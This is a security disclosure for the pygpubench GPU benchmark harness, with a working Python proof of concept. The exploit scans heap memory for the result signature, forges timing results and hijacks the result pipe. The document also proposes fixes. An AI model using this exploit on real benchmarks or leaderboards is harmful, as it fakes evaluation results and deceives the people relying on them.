
pygpubench Signature Authentication Bypass #23

@josusanmartin

Description


Summary

pygpubench authenticates benchmark results using a random signature that is sent from the parent process to the child process over a pipe. The child's C++ code stores this signature in a std::string on the heap. Because the child process can read its own /proc/self/maps and scan heap memory with ctypes, it can extract the signature, write forged results to the inherited pipe fd, and redirect the pipe to /dev/null before the C++ benchmark loop runs. The parent accepts the forged results because they contain the correct signature.

This is a complete benchmark bypass: the attacker controls all reported times, error counts, and completion status without running a real kernel.

Severity

Critical — full benchmark integrity failure for any problem using do_bench_isolated.

Affected Component

pygpubench.do_bench_isolated — specifically the signature-based result authentication in python/pygpubench/__init__.py:230-259 and the signature storage in csrc/manager.cpp:127.

Root Cause

The signature is a shared secret between the parent and child processes. It is transmitted to the child over a pipe (sig_r/sig_w), read by the C++ code in read_benchmark_parameters, and stored in BenchmarkManager::mSignature (a std::string member). The untrusted kernel is imported after the signature is already in child-process memory. Since the child process runs attacker-controlled Python code, the attacker can read arbitrary process memory using ctypes and recover the signature.
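As a minimal illustration of the underlying capability (a sketch, not the PoC itself): any Python code can dereference raw addresses in its own address space via ctypes, with no syscall a sandbox could mediate:

```python
import ctypes

# A secret that happens to live somewhere in this process's memory...
buf = ctypes.create_string_buffer(b"super-secret-signature")

# ...can be recovered through a direct pointer dereference: no syscall,
# no /proc access, nothing a filesystem sandbox can intercept.
addr = ctypes.addressof(buf)
leaked = ctypes.string_at(addr, len(b"super-secret-signature"))
print(leaked)  # b'super-secret-signature'
```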

Why existing defenses don't prevent this

| Defense | Why it doesn't help |
| --- | --- |
| PR_SET_DUMPABLE=0 | Prevents other processes from reading /proc/PID/mem. Does not affect the process reading its own /proc/self/maps (inode mode S_IRUGO = 0444, world-readable). Does not affect ctypes memory access (direct pointer dereference, no filesystem I/O). |
| Landlock | Allows read-only access to / (covers procfs). Allows read-write access to /dev (needed for the /dev/null redirect). Does not restrict ctypes or os.write to inherited pipe fds. |
| PR_SET_NO_NEW_PRIVS | Prevents privilege escalation. Does not restrict memory reads within the process. |
| C++ benchmark loop | Runs after the kernel is imported. The exploit injects forged results at import time, before the benchmark loop starts. |
| Error counter randomization | Irrelevant: the exploit forges the error-count field directly in the pipe output, bypassing the GPU-side counter entirely. |
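The PR_SET_DUMPABLE row can be verified directly (Linux only; the constant value is taken from `<sys/prctl.h>`):

```python
import ctypes

PR_SET_DUMPABLE = 4  # value from <sys/prctl.h>

libc = ctypes.CDLL(None, use_errno=True)
assert libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) == 0

# Even with the dumpable flag cleared, the process can still read its
# own memory map: the 0444 mode on /proc/self/maps applies to everyone.
with open("/proc/self/maps") as f:
    regions = f.readlines()
assert len(regions) > 0
```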

The attack chain

```
Parent                                          Child (subprocess)
──────                                          ──────────────────
secrets.token_hex(16) → signature
write signature to sig_w pipe ──────────────►   C++ reads sig_r → mSignature (heap)
                                                C++ calls setup_benchmark()
                                                C++ installs landlock
                                                C++ calls kernel_from_qualname()
                                                  └─► import submission  ◄──── ATTACKER CODE RUNS HERE
                                                        ├─ gc.get_objects() → count tuples → repeats
                                                        ├─ open("/proc/self/maps") → heap regions
                                                        ├─ ctypes.string_at(heap) → signature
                                                        ├─ os.fstat(0..255) → pipe fd
                                                        ├─ os.write(pipe_fd, forged_results + signature)
                                                        ├─ os.dup2(/dev/null, pipe_fd)
                                                        └─ define correct kernel()
                                                C++ benchmark loop runs (writes go to /dev/null)
                                                process exits with code 0
reads pipe → forged data       ◄────────────
validates signature → PASS
accepts forged times (0.42 µs)
```

Proof of Concept

File: submission_memscan_signature.py

The PoC runs entirely at import time (before the C++ benchmark loop executes):

```python
import ctypes
import gc
import os
import re
import stat

import torch

# Step 1: Count (tensor, rtol, atol) tuples in gc → infer repeats
expected_count = 0
for obj in gc.get_objects():
    if isinstance(obj, tuple) and len(obj) == 3:
        a, b, c = obj
        if (isinstance(a, torch.Tensor) and a.is_cuda
                and isinstance(b, float) and isinstance(c, float)):
            expected_count += 1
repeats = expected_count - 1  # subtract warmup slot

# Step 2: Read /proc/self/maps, scan heap for a 32-char hex string
candidates = []
with open('/proc/self/maps') as f:
    for line in f:
        if '[heap]' not in line:
            continue
        start, end = (int(x, 16) for x in line.split()[0].split('-'))
        data = ctypes.string_at(start, end - start)
        for match in re.finditer(rb'(?<![0-9a-f])([0-9a-f]{32})\x00', data):
            candidates.append(match.group(1).decode())
signature = candidates[0]  # the full PoC tries each candidate

# Step 3: Find pipe fd (skip fds that are not open)
pipe_fds = []
for fd in range(256):
    try:
        if stat.S_ISFIFO(os.fstat(fd).st_mode):
            pipe_fds.append(fd)
    except OSError:
        continue
pipe_fd = pipe_fds[-1]  # the full PoC identifies the result pipe among these

# Step 4: Write forged results with the extracted signature
payload = "event-overhead\t0.002 us\n"
for i in range(repeats):
    payload += f"{i}\t0.42\n"       # 0.42 µs per iteration
payload += f"signature\t{signature}\n"
os.write(pipe_fd, payload.encode())

# Step 5: Redirect pipe to /dev/null (C++ output goes nowhere)
os.dup2(os.open('/dev/null', os.O_WRONLY), pipe_fd)

# Step 6: Correct kernel so the process exits cleanly (exit code 0)
def kernel(output, inp):
    torch.sum(inp * weights, dim=-1, out=output)
```

Running the PoC

```bash
cd pygpubench/exploits
python run_all.py submission_memscan_signature
```

Expected output: CHEAT SUCCEEDED (bypassed detection) — the benchmark reports 0.42 µs per iteration with no errors, despite the kernel not being the one that was timed.

Prerequisites

  • Linux (for /proc/self/maps and landlock)
  • CUDA GPU (for torch tensor operations)
  • pygpubench installed (pip install pygpubench)

Additional Findings

GC metadata leakage (HIGH)

At kernel import time, gc.get_objects() reveals all expected-output tuples (tensor, rtol, atol) created by the test generator. Even though the tensor data has been zeroed, the Python tuple objects are still alive because the C++ std::vector<nb::tuple> holds strong references. This reveals:

  • Exact repeats value — needed to construct correctly-sized forged results
  • Output tensor shapes and dtypes — useful for other exploit strategies
  • Tolerance values — useful for crafting outputs that barely pass

The signature exploit depends on this to know how many iteration results to forge.

Source: csrc/manager.cpp:143-166 (setup_benchmark stores tuples in vectors that persist through do_bench_py).

Fix: After copying expected data to C++ memory, release the Python tuple references (expected.clear()) and call gc.collect() before importing the kernel.
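Both the leak and the proposed fix can be reproduced in pure Python; in this sketch a plain class stands in for the expected-output tensors and a list for the C++ vector holding the strong references:

```python
import gc

class FakeTensor:
    pass  # stand-in for the expected-output tensor objects

# Held alive the way the C++ std::vector<nb::tuple> holds the real tuples.
cases = [(FakeTensor(), 1e-5, 1e-8) for _ in range(4)]

def scan():
    # Attacker-style enumeration at kernel import time.
    return sum(
        1 for obj in gc.get_objects()
        if isinstance(obj, tuple) and len(obj) == 3
        and isinstance(obj[0], FakeTensor)
    )

before = scan()  # 4: repeats, shapes, and tolerances are all recoverable
cases.clear()    # analogue of expected.clear()
gc.collect()     # analogue of trigger_gc()
after = scan()   # 0: nothing left for the import-time scan
print(before, after)  # 4 0
```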

Warmup detection (MEDIUM)

The warmup phase always uses args.at(0) (csrc/manager.cpp:301-324). The kernel can detect warmup by tracking input.data_ptr() (same pointer every warmup call, different pointer for benchmark calls) and add artificial delay to inflate time_estimate, reducing actual_calls to the minimum of 3.
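A sketch of the detection logic a malicious kernel could use, with plain integers standing in for data_ptr() values:

```python
# Warmup reuses one input buffer, so a pointer seen more than once marks a
# warmup call; the kernel could sleep on those to inflate time_estimate.
seen = {}

def is_warmup(ptr):
    seen[ptr] = seen.get(ptr, 0) + 1
    return seen[ptr] > 1

calls = [0xA000, 0xA000, 0xA000, 0xB000, 0xC000]  # 3 warmup calls, then 2 real
flags = [is_warmup(p) for p in calls]
print(flags)  # [False, True, True, False, False]
```

The very first warmup call is misclassified, but every subsequent reuse is caught, which is enough to pad the timing estimate.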

Fix: Randomize which test case is used for warmup.

NaN wildcard in checker (LOW, latent)

csrc/check.cu:44-46 treats NaN in expected output as a wildcard:

```cpp
if (isnan(a))
    return;  // accepts ANY received value
```

Currently not exploitable because expected outputs are in non-torch cudaMalloc memory at unknown addresses. But if any future attack vector reveals those addresses, NaN injection would bypass correctness entirely.
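The wildcard semantics are easy to model in Python (math.isnan mirroring the device-side isnan; element_ok and the atol-only comparison are illustrative simplifications):

```python
import math

def element_ok(expected, received, atol=1e-5):
    # Mirrors the csrc/check.cu behavior: NaN in expected matches anything.
    if math.isnan(expected):
        return True
    return abs(expected - received) <= atol

print(element_ok(float("nan"), 1e9))  # True: any received value passes
print(element_ok(0.0, 1e9))           # False
```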

Fix: Remove the NaN wildcard. Treat NaN in expected output as a test-generation bug and fail the benchmark.

ctypes CUDA runtime access (LOW, latent)

The submission can call CUDA runtime functions via ctypes.CDLL('libcudart.so') — including cudaMemcpy, cudaMemset, and cudaPointerGetAttributes. Combined with heuristics about cudaMalloc allocation patterns, this could theoretically locate expected output copies or the error counter in GPU memory.

Currently impractical because: (a) the error counter has a random offset + random shift in a 2 MiB arena, and (b) expected output addresses are not predictable. But this is a latent risk.

Fix: Consider seccomp filters to restrict CUDA-related ioctl syscalls to only the specific ioctls needed for kernel launch and synchronization.

Recommended Fixes

For the signature bypass (critical)

Option A: HMAC-based authentication (minimal change)

  1. At C++ init time (before any user code), read 32 bytes from /dev/urandom into a local C++ variable
  2. Send these bytes to the parent over a one-way pipe (parent reads, child writes, pipe is closed)
  3. After the benchmark loop, compute HMAC-SHA256 over the raw result bytes using the key
  4. Append the HMAC tag to the pipe output
  5. Overwrite the key in memory (memset_explicit) before importing the kernel
  6. The parent recomputes the HMAC and rejects mismatches

Since the key is consumed and explicitly overwritten before the kernel is imported, memory scanning cannot recover it.
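A minimal sketch of the child-side tag computation and parent-side check, using only the standard library (the variable names are illustrative, not the proposed API):

```python
import hashlib
import hmac
import os

key = os.urandom(32)  # step 1: generated before any user code runs
results = b"event-overhead\t0.002 us\n0\t0.42\n"

# Child side, after the benchmark loop (steps 3-4): tag the raw result bytes.
tag = hmac.new(key, results, hashlib.sha256).digest()

# Parent side (step 6): recompute over the received bytes, compare in constant time.
genuine = hmac.compare_digest(tag, hmac.new(key, results, hashlib.sha256).digest())

# Any tampering with the result bytes invalidates the tag.
forged = results.replace(b"0.42", b"0.01")
tampered = hmac.compare_digest(tag, hmac.new(key, forged, hashlib.sha256).digest())

print(genuine, tampered)  # True False
```

In the real fix the parent holds its own copy of the key (received from the child before any import), so the child's wiped copy cannot be recovered by memory scanning.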

Option B: Separate validator process (stronger)

Run the benchmark in a three-process architecture:

  • Orchestrator (trusted): generates test cases, owns the result pipe
  • Worker (untrusted): runs the kernel, writes raw timing events to a pipe
  • Validator (trusted, never imports submission): reads the same inputs, runs the reference kernel, compares outputs

The worker never sees expected outputs or authentication keys.

For GC metadata leakage

```cpp
// In do_bench_py, after copying expected outputs:
expected.clear();      // release Python tuple references
trigger_gc();          // clean up
// THEN import the kernel
```

For warmup detection

```cpp
// Instead of always using args.at(0):
std::uniform_int_distribution<int> warmup_dist(0, calls - 1);  // bounds are inclusive
int warmup_idx = warmup_dist(rng);
// Use args.at(warmup_idx) for warmup
```

For NaN wildcard

```cpp
// In check_approx_match_kernel:
if (isnan(a)) {
    ++res;  // NaN in expected = test bug, not wildcard
    return;
}
```

What pygpubench Gets Right

Despite this finding, pygpubench is a massive improvement over the original evaluator:

| Attack class | Original evaluator | pygpubench |
| --- | --- | --- |
| __code__ patching | Trivially exploitable | Fully blocked (C++ implementation) |
| torch.cuda.Event patching | Trivially exploitable | Fully blocked (C CUDA API) |
| GC NaN injection on expected outputs | N/A (no protection) | Blocked (cudaMalloc copy + zeroing) |
| GC answer copy | N/A (no protection) | Blocked (expected data zeroed) |
| Stream-based timing manipulation | N/A (no protection) | Blocked (programmatic stream serialization + randomized block checking) |
| Filesystem tampering | N/A (no sandboxing) | Blocked (landlock) |
| Error counter manipulation | N/A (no counter) | Effectively blocked (random offset + shift) |
| Input caching | N/A (no protection) | Blocked (shadow args + canaries + L2 clear) |

The old Class 1 (__code__ patching) and Class 2 (timing infrastructure patching) exploits that affected every leaderboard on gpumode.com/home are completely eliminated. The remaining signature bypass requires significantly more sophistication and is straightforward to fix.

Disclosure Timeline

| Date | Event |
| --- | --- |
| 2026-03-07 | Original evaluator vulnerability disclosed to GPU MODE team |
| 2026-03-07 | GPU MODE responds, points to pygpubench as the replacement |
| 2026-03-07 | pygpubench security review conducted; signature bypass identified |
| 2026-03-07 | This report and PoC prepared |

Files

| File | Description |
| --- | --- |
| submission_memscan_signature.py | PoC exploit: memory scan + pipe hijack |
| This document | Full security audit and disclosure |
